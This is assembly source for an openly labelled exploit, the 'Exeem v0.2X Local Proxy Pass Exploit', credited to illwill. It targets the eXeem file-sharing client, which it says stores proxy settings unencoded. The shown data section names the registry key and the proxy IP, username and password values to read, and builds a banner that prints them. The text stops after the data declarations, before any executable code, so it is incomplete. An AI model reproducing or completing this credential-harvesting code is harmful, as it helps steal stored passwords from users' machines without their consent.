1 ;Nothing Special other than the program doesnt encode the proxy info.
2
3 .386
4 .model flat, stdcall
5 option casemap :none
6 include \masm32\include\windows.inc
7 include \masm32\include\user32.inc
8 include \masm32\include\kernel32.inc
9 include \masm32\include\shell32.inc
10 include \masm32\include\advapi32.inc
11 include \masm32\include\masm32.inc
12 includelib \masm32\lib\user32.lib
13 includelib \masm32\lib\kernel32.lib
14 includelib \masm32\lib\shell32.lib
15 includelib \masm32\lib\advapi32.lib
16 includelib \masm32\lib\masm32.lib
17 literal MACRO quoted_text:VARARG
18 LOCAL local_text
19 .data
20 local_text db quoted_text,0
21 .code
22 EXITM <local_text>
23 ENDM
24 SADD MACRO quoted_text:VARARG
25 EXITM <ADDR literal(quoted_text)>
26 ENDM
27 .data
28 SubKey db "Software\\Exeem\",0
29
szIP db "proxy_ip",0
30
szUser db "proxy_username",0
31
szPass db "proxy_password",0
32
noExeem db "eXeem v0.2X is not installed on your pc!",0
33
NotFound db "Info NOT Stored.",0
34
Theoutput db ’_______________________________________________________________’,13,10
35
db ’* Exeem v0.2X Local Proxy Pass Exploit *’,13,10
36
db ’* Based On Kozans code in C *’,13,10
37
db ’* by illwill − xillwillx@yahoo.com *’,13,10
38
db ’*_____________________________________________________________*’,13,10
39
db ’ Proxy IP: %s ’,13,10
40
db ’ UserName: %s ’,13,10
41
db ’ Password: %s ’,13,10,0
42
KeySize DWORD 255
43
.data?
44
TheIPData db 64 dup (?)
45
TheUSERData db 64 dup (?)
46
ThePASSData db 64 dup (?)
4